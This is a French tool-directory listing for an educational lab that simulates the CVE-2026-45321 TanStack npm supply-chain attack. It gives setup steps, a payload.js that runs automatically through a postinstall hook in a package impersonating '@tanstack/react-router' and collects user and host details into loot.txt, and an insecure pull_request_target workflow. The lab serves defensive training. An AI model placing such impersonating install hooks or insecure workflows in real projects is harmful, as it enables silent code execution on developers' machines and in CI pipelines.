Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/7whyex/cve-2026-45321-tanstack
Analyse des VulnérabilitésAnalyse de MalwareSécurité de la Chaîne LogistiqueApprentissage et ÉducationLabs et Pratique
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Laboratoire éducatif simulant des attaques sur la chaîne d'approvisionnement npm, des abus CI/CD et l'exécution de code au moment de l'installation via CVE-2026-45321. Formation pratique en sécurité défensive avec déploiement local de paquets malveillants.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 moisPas encore vérifié

Simulation d'attaque sur la chaîne d'approvisionnement — CVE-2026-45321 (TanStack)

Laboratoire éducatif pour comprendre les attaques sur la chaîne d'approvisionnement npm, l'abus CI/CD et l'exécution de code au moment de l'installation

Avertissement

Ce projet est créé uniquement pour :

  • l'apprentissage de la cybersécurité,
  • la recherche en sécurité défensive,
  • la simulation en laboratoire local,
  • comprendre le concept d'attaque sur la chaîne d'approvisionnement.

N'utilisez pas ce projet pour :

  • attaquer des systèmes réels,
  • voler des identifiants,
  • déployer des malwares,
  • accès non autorisé,
  • ou toute autre activité illégale.

Description

Ce laboratoire simule les concepts de base de l'incident :

  • CVE-2026-45321
  • Compromission de la chaîne d'approvisionnement npm de TanStack
  • Abus des GitHub Actions CI/CD
  • Exécution de scripts via le cycle de vie npm

La simulation est réalisée localement et en toute sécurité, sans :

  • vol réel d'identifiants,
  • exfiltration de jetons,
  • ou compromission de services tiers.

Structure du laboratoire

root@kitploit:~
lab/
├── fake-repo/          # Simulation du dépôt cible
├── attacker-package/   # Simulation du paquet malveillant
└── victim-project/     # Simulation de la victime

Fonctionnement de la simulation

root@kitploit:~
Paquet attaquant
        ↓
npm install
        ↓
le script postinstall s'exécute
        ↓
payload.js est exécuté automatiquement
        ↓
La victime subit une exécution au moment de l'installation

Concepts abordés

  • hooks du cycle de vie npm
  • exécution de code arbitraire au moment de l'installation
  • attaque sur la chaîne d'approvisionnement
  • frontière de confiance CI/CD
  • paquet npm malveillant
  • abus de postinstall
  • compromission de dépendance

Installation

1. Cloner le dépôt

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Configuration du paquet attaquant

2. Accéder au dossier du paquet attaquant

root@kitploit:~
cd attacker-package

3. Installer les dépendances

root@kitploit:~
npm install

4. Construire le paquet tarball

root@kitploit:~
npm pack

Résultat :

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Simulation de la victime

5. Accéder au projet victime

root@kitploit:~
cd ../victim-project

6. Installer le paquet malveillant

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Résultat

Si réussi, le message suivant apparaît :

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

et le fichier :

root@kitploit:~
loot.txt

est créé automatiquement.


Exemple de payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Exemple de package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

Simulation CI/CD

Ce projet peut également être utilisé pour comprendre :

  • GitHub Actions
  • pull_request_target
  • frontière de privilège CI/CD
  • exécution de dépendances

Exemple de workflow :

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Relation avec CVE-2026-45321

Simulation du labMonde réel
attacker-packagepaquet TanStack compromis
payload.jsinstallateur malveillant

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

À des fins éducatives uniquement

Ce laboratoire est créé pour sensibiliser à :

  • la sécurité de la chaîne d'approvisionnement,
  • la sécurité des dépendances,
  • la sécurité CI/CD,
  • et la recherche en sécurité défensive.
Télécharger l’outil
postinstallabus du hook du cycle de vie
victim-projectdéveloppeur/CI victime
fake-repopipeline GitHub Actions